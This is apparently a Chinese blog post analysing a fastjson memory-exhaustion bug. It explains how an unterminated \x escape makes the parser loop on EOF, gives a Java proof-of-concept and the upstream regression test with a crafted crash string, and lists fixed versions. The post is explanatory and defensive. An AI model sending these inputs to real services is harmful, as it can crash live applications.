分析FastJson OOM内存溢出 bug

起因,事情的背景

1.  2019年9月5日，360CERT监测到2019年9月3日fastjson在commit 995845170527221ca0293cf290e33a7d6cb52bf7上提交了旨在修复当字符串中包含\x转义字符时可能引发OOM的问题的修复。

360CERT 判断该漏洞危害中。影响面较大。攻击者可以通过发送构造好的请求而致使当前线程瘫痪，当发送的恶意请求过多时有可能使业务直接瘫痪。

建议广大用户对自身的业务/产品进行组件自查，防止自身业务受到攻击。

2  这个漏洞详情:

     漏洞的关键点在com.alibaba.fastjson.parser.JSONLexerBase#scanString中，当传入json字符串时，fastjson会按位获取json字符串，当识别到字符串为\x为开头时，会默认获取后两位字符，并将后两位字符与\x拼接将其变成完整的十六进制字符来处理：

使用的maven版本是:

    


    com.alibaba
    fastjson
    1.2.30

类的位置: package com.alibaba.fastjson.parser; 方法是 copyTo

  而当json字符串是以\x结尾时，由于fastjson并未对其进行校验，将导致其继续尝试获取后两位的字符。也就是说会直接获取到\u001A也就是EOF：

当fastjson再次向后进行解析时，会不断重复获取EOF，并将其写到内存中，直到触发oom错误：
不断的获取 EOF的值,相当于是死循环.

正常情况下的我 cpu 的情况是这样的

抛出的异常是这样的

方法开始执行后我cpu 的情况

这边贴出我的代码:

这上面有导出的包,使用的idea编译器,maven版本是:

   

    com.alibaba
    fastjson
    1.1.30

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.JSONLexerBase;
import com.alibaba.fastjson.JSONObject;
 
import java.io.UnsupportedEncodingException;
import java.net.URLDecoder;
 
public class TestJsonDemo {
    public static void main(String[] args) throws Exception {
        String line = new String("[{\\x22a\\x22:\\x22a\\xB1ph.\\xCD\\x86\\xBEI\\xBA\\xC3\\xBCiM+\\xCE\\xCE\\x1E\\xDF7\\x1E\\xD9z\\xD9Q\\x8A}\\xD4\\xB2\\xD5\\xA0y\\x98\\x08@\\xE1!\\xA8\\xEF^\\x0D\\x7F\\xECX!\\xFF\\x06IP\\xEC\\x9F[\\x85;\\x02\\x817R\\x87\\xFB\\x1Ch\\xCB\\xC7\\xC6\\x06\\x8F\\xE2Z\\xDA^J\\xEB\\xBCF\\xA6\\xE6\\xF4\\xF7\\xC1\\xE3\\xA4T\\x89\\xC6\\xB2\\x5Cx]");
        line = line.replaceAll("\\\\x", "%");
        String decodeLog = URLDecoder.decode(line, "UTF-8");
        JSON.parse(decodeLog);
    }
}

社区的精彩仅供常考:

感兴趣的可以自己去看一下

解决后的代码是这样的:

src/main/java/com/alibaba/fastjson/parser/JSONLexerBase.java

package com.alibaba.json.bvt.issue_2600;
 
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONException;
import junit.framework.TestCase;
 
import java.net.URLDecoder;
 
public class Issue2689 extends TestCase {
 
    final String DEATH_STRING = "{\"a\":\"\\x";
 
    public void test_OOM() throws Exception {
 
        String line = new String("[{\\x22a\\x22:\\x22a\\xB1ph.\\xCD\\x86\\xBEI\\xBA\\xC3\\xBCiM+\\xCE\\xCE\\x1E\\xDF7\\x1E\\xD9z\\xD9Q\\x8A}\\xD4\\xB2\\xD5\\xA0y\\x98\\x08@\\xE1!\\xA8\\xEF^\\x0D\\x7F\\xECX!\\xFF\\x06IP\\xEC\\x9F[\\x85;\\x02\\x817R\\x87\\xFB\\x1Ch\\xCB\\xC7\\xC6\\x06\\x8F\\xE2Z\\xDA^J\\xEB\\xBCF\\xA6\\xE6\\xF4\\xF7\\xC1\\xE3\\xA4T\\x89\\xC6\\xB2\\x5Cx]");
        line = line.replaceAll("\\\\x", "%");
        String decodeLog = URLDecoder.decode(line, "UTF-8");
        System.out.println(decodeLog);
        try {
            Object obj = JSON.parse(decodeLog);
            obj = JSON.parse(DEATH_STRING);
        } catch (Exception e) {
            assertEquals(e.getClass(), JSONException.class);
            assertTrue(e.getMessage().contains("invalid escape character \\x"));
        }
    }
}

测试代码的引用地址:  this

 影响版本
fastjson < 1.2.60版本

360给出的修复建议
1.1.15~1.1.31版本更新到1.1.31.sec07版本
1.1.32~1.1.33版本更新到1.1.33.sec06版本
1.1.34 版本更新到1.1.34.sec06版本
1.1.35~1.1.46版本更新到1.1.46.sec06版本
1.2.3~1.2.7版本更新到1.2.7.sec06版本或1.2.8.sec04版本
1.2.8 版本更新到1.2.8.sec06版本
1.2.9~1.2.29 版本更新到1.2.29.sec06版本
 
————————————————
版权声明：本文为CSDN博主「徐小冠」的原创文章，遵循 CC 4.0 BY-SA 版权协议，转载请附上原文出处链接及本声明。
原文链接：https://blog.csdn.net/weixin_42114097/article/details/100609632